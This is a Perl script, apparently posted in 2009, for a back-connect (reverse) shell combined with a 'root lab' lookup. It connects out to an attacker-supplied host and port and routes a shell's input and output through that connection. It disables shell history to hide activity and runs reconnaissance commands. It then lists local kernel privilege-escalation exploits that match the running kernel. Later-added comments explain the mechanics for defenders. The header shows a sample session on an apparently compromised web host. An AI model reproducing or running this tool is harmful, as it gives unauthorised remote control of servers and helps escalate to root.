Perl BackConnectShell + Rootlab t00l

2009-02-02 13:07
#!/usr/bin/perl
# D.O.M TEAM - 2007
# anonyph; arp; ka0x; xarnuz
# 2005 - 2007
# BackConnectShell + Rootlab t00l
# priv8!
# [email protected]
#
# Backconnect by data cha0s (modificada por D.O.M)
# r00t l4b by D.O.M
#
# ka0x:~/Desktop # ./nc -lvvp 8600
# listening on [any] 8600 ...
# 66.232.128.123: inverse host lookup failed: h_errno 11004: NO_DATA
# connect to [00.00.00.00] from (UNKNOWN) [66.232.128.123] 40444: NO_DATA

# ******* ConnectBack Shell *******

# Linux version 2.6.9-022stab078.14-smp ([email protected]) (gcc version 3.
# 3.3 20040412 (Red Hat Linux 3.3.3-7)) #1 SMP Wed Jul 19 14:26:20 MSD 2006
# apache
# uid=48(apache) gid=48(apache) groups=48(apache),500(webadmin ),2523(psaserv)
# /home/httpd/vhosts/holler.co.uk/httpdocs/datatest

# Kernel local: 2.6.9-022stab078.14-smp

# P0sible 3xploit: exp.sh
# P0sible 3xploit: krad3
# P0sible 3xploit: newsmp
# P0sible 3xploit: ptrace_kmod
# P0sible 3xploit: py2
# P0sible 3xploit: ong_bak
# P0sible 3xploit: prctl3
# P0sible 3xploit: prctl
# P0sible 3xploit: kmdx
# P0sible 3xploit: pwned
#
# sh: no job control in this shell
# sh-2.05b$

use IO::Socket;
use Socket;
use FileHandle;

# Shell handed to the remote listener at the very end of the script
# (see the trailing `system($system)`). Package global: the file has no
# `use strict`.
$system = '/bin/bash';
# Usage check: the tool expects a listener host (ARGV[0]) and port (ARGV[1]).
# Only ARGV[0] is tested, so a missing port still reaches connect() below.
if(!$ARGV[0])
{
# As the page shows it, `/n` is a literal slash-n in these strings, not a newline.
print "/nBackConnect Shell - D.O.M TEAM/n/n";
print "Usage: perl $0 [IPHOST] [NCPORT]/n";
print "Example: perl $0 82.85.55.21 6850/n/n";
exit;
}

# Outbound TCP connection to the host/port given on the command line; the
# listener side of the exchange is the `nc -lvvp` session shown in the header.
# Note the `die print ...` idiom: print's return value (1) becomes the die
# message, so the text below goes to STDOUT and the process exits with "1 at ...".
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) ||
die print "[-] Protocolo Desconocido/n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) ||
die print "[-] Error Socket/n";
# These status lines are still written to the local STDOUT; the redirection
# onto the socket happens after them.
print "[+] BackConnect Shell/n";
print "[+] Conectando a $ARGV[0]... /n";
print "[+] Enviando Shell... /n";
print "[+] Conectado. /n";
SOCKET->autoflush();
# Core of the reverse shell: the process's three standard streams are dup'd
# onto the socket (`>&SOCKET`), so everything the child shells below read and
# write goes to the remote listener. For a defender this is the observable
# state: a perl process whose fds 0/1/2 are one TCP socket, with a shell child.
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "/n******* ConnectBack Shell *******/n/n";
# First command batch over the socket: shell history is disabled (HISTFILE and
# SAVEHIST unset — an anti-forensics step) and basic host/user recon is echoed
# back, matching the sample output in the header. One-arg system() with `;`
# in the string means this runs through `sh -c`.
system("unset HISTFILE;unset SAVEHIST ;cat /proc/version;whoami;id;who;pwd");

# Rootkernel

# Running kernel release (the header sample shows "2.6.9-022stab078.14-smp"),
# compared against the version table below by busca(). Printed to the socket,
# since STDOUT has already been redirected.
my $khost = `uname -r`;
chomp($khost);
print "/nKernel local: $khost/n/n";

# Lookup table for the "root lab" half of the tool: exploit name => list of
# kernel-release prefixes it is claimed to apply to (2.2.x/2.4.x/2.6.x era
# local privilege-escalation exploits; the bare names are the only
# identification given here). busca() below prints a name whenever the
# running kernel release starts with one of its prefixes. Nothing is run from
# this table — it only drives the printed suggestions. Entries containing a
# stray space ('2. 4.19', '2.6 .12', ...) can never match a real `uname -r`
# string as written.
my %h;
$h{'w00t'} = { vuln=>['2.4.18','2.4.10','2.4.21','2. 4.19','2.4.17','2.4. 16','2.4.20'] };
$h{'brk'} = { vuln=>['2.4.22','2.4.21','2.4.10','2. 4.20'] };
$h{'ave'} = { vuln=>['2.4.19','2.4.20'] };
$h{'elflbl'} = { vuln=>['2.4.29'] };
$h{'elfdump'} = { vuln=>['2.4.27'] };
$h{'expand_stack'} = { vuln=>['2.4.29'] };
$h{'h00lyshit'} = { vuln=>['2.6.8','2.6.10','2.6.11','2.6 .12'] };
$h{'kdump'} = { vuln=>['2.6.13'] };
$h{'km2'} = { vuln=>['2.4.18','2.4.22'] };
$h{'krad'} = { vuln=>['2.6.11'] };
$h{'krad3'} = { vuln=>['2.6.11','2.6.9'] };
$h{'local26'} = { vuln=>['2.6.13'] };
$h{'loko'} = { vuln=>['2.4.22','2.4.23','2.4.24'] };
$h{'mremap_pte'} = { vuln=>['2.4.20','2.2.25','2.4.24'] };
$h{'newlocal'} = { vuln=>['2.4.17','2.4.19'] };
$h{'ong_bak'} = { vuln=>['2.4.','2.6.'] };
$h{'ptrace'} = { vuln=>['2.2.24','2.4.22'] };
$h{'ptrace_kmod'} = { vuln=>['2.4.','2.6.'] };
$h{'ptrace24'} = { vuln=>['2.4.9'] };
$h{'pwned'} = { vuln=>['2.4.','2.6.'] };
$h{'py2'} = { vuln=>['2.6.9','2.6.17','2.6.15','2.6 .13'] };
$h{'raptor_prctl'} = { vuln=>['2.6.13','2.6.17','2.6.16','2. 6.13'] };
$h{'prctl3'} = { vuln=>['2.6.13','2.6.17','2.6.9'] };
$h{'remap'} = { vuln=>['2.4.'] };
$h{'rip'} = { vuln=>['2.2.'] };
$h{'stackgrow2'} = { vuln=>['2.4.29','2.6.10'] };
$h{'uselib24'} = { vuln=>['2.4.29','2.6.10','2.4.22','2. 4.25'] };
$h{'newsmp'} = { vuln=>['2.6.'] };
$h{'smpracer'} = { vuln=>['2.4.29'] };
$h{'loginx'} = { vuln=>['2.4.22'] };
$h{'exp.sh'} = { vuln=>['2.6.9','2.6.10','2.6.16','2.6 .13'] };
$h{'prctl'} = { vuln=>['2.6.'] };
$h{'kmdx'} = { vuln=>['2.6.','2.4.'] };

# Run the kernel-version match once; the sub is defined directly below.
# `&busca;` (ampersand, no parens) passes the caller's current @_ through,
# which the sub never reads.
&busca;
# Prints "P0sible 3xploit: <name>" for every table entry whose version list
# holds a prefix of the running kernel release ($khost, a file-level lexical).
# Output goes to the remote side, since STDOUT was redirected to the socket.
# Reads %h and $khost; takes no arguments.
sub busca {
foreach my $key(keys %h){

foreach my $kernel ( @{ $h{$key}{'vuln'} } ){

# $kernel is interpolated into the pattern unescaped, so each '.' in the
# version string acts as a single-character wildcard; only the start of the
# release string is anchored, so this is looser than a literal prefix compare.
if($khost=~/^$kernel/){
# NOTE(review): this guard does not read as a well-formed regex literal on
# the page (`//.$/`), so its effect cannot be determined from this listing.
# $kernel aliases the array element, so a chop() here edits %h in place.
chop($kernel) if ($kernel=~//.$/);
print "P0sible 3xploit: ". $key ."/n";
}
}
}
}
print "/n/n/n";
# Hand the connection to an interactive shell. The first system() blocks until
# that `sh -i` exits (`exec` replaces the `sh -c` wrapper shell, not this perl
# process); the $system shell (/bin/bash) then starts as a fallback. TERM is
# exported so the remote side gets a terminal type.
system 'export TERM=xterm;exec sh -i';
system($system);


__END__
